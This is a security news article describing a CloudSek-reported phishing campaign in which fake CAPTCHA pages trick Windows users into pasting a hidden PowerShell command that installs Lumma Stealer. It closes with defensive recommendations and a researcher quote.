- Phishing campaign imitates CAPTCHA to deliver hidden malware commands
- Hidden PowerShell Command in Verification Leads to Lumma Stealer Attack
- Educating users about phishing tactics is key to preventing such attacks
CloudSek has discovered a sophisticated method of distributing Lumma Stealer malware that poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unintentionally executing harmful commands.
Although the campaign primarily focuses on spreading Lumma Stealer malware, its methodology could potentially be adapted to spread a wide variety of other malware.
How the phishing campaign works
The campaign uses trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing sites, using modular malware delivery where the initial executable downloads additional components or modules, complicating thus detection and analysis efforts.
The infection chain in this phishing campaign begins when malicious actors lure victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into thinking they are performing a standard security check.
The attack takes a more deceptive turn once the user clicks the “Verify” button. Behind the scenes, a hidden JavaScript function activates, copying a base64-encoded PowerShell command to the user’s clipboard without their knowledge. The phishing page then asks the user to perform a series of unusual steps, such as opening the Run dialog box (Win+R) and pasting the copied command. These instructions, when followed, cause the PowerShell command to be executed in a hidden window, invisible to the user, making detection by the victim almost impossible.
The hidden PowerShell command is at the heart of the attack. It connects to a remote server to download additional content such as a text file (a.txt) containing instructions to recover and execute the Lumma Stealer malware. Once this malware is installed on the system, it establishes connections with domains controlled by the attackers. This allows attackers to compromise the system, steal sensitive data, and potentially launch other malicious activities.
To guard against this phishing campaign, users and organizations should prioritize security awareness and implement proactive defenses. A crucial first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – highlights the importance of informing users of the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands. Users should be trained to recognize phishing tactics and question unexpected CAPTCHA checks or unknown instructions involving the execution of system commands.
In addition to training, deploying robust endpoint protection is essential to defend against PowerShell-based attacks. Since the attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioral analysis and real-time monitoring can detect unusual command executions, helping prevent the download and installation of malware.
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams should pay particular attention to connections with newly registered or uncommon domains, which are often used by attackers to distribute malware or steal sensitive data.
Finally, keeping systems up to date with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are patched, limiting the ability for attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer.
“This new tactic is particularly dangerous because it undermines users’ trust in the widely recognized CAPTCHA checks they regularly encounter online. By hiding malicious activity behind what appears to be a routine security check, attackers can easily trick users into running harmful commands on their computers. What is more concerning is that this technique, which currently distributes Lumma Stealer, could be adapted to spread other types of malware, making it a very versatile and scalable threat,” said researcher Anshuman Das safe at. CloudSEK.
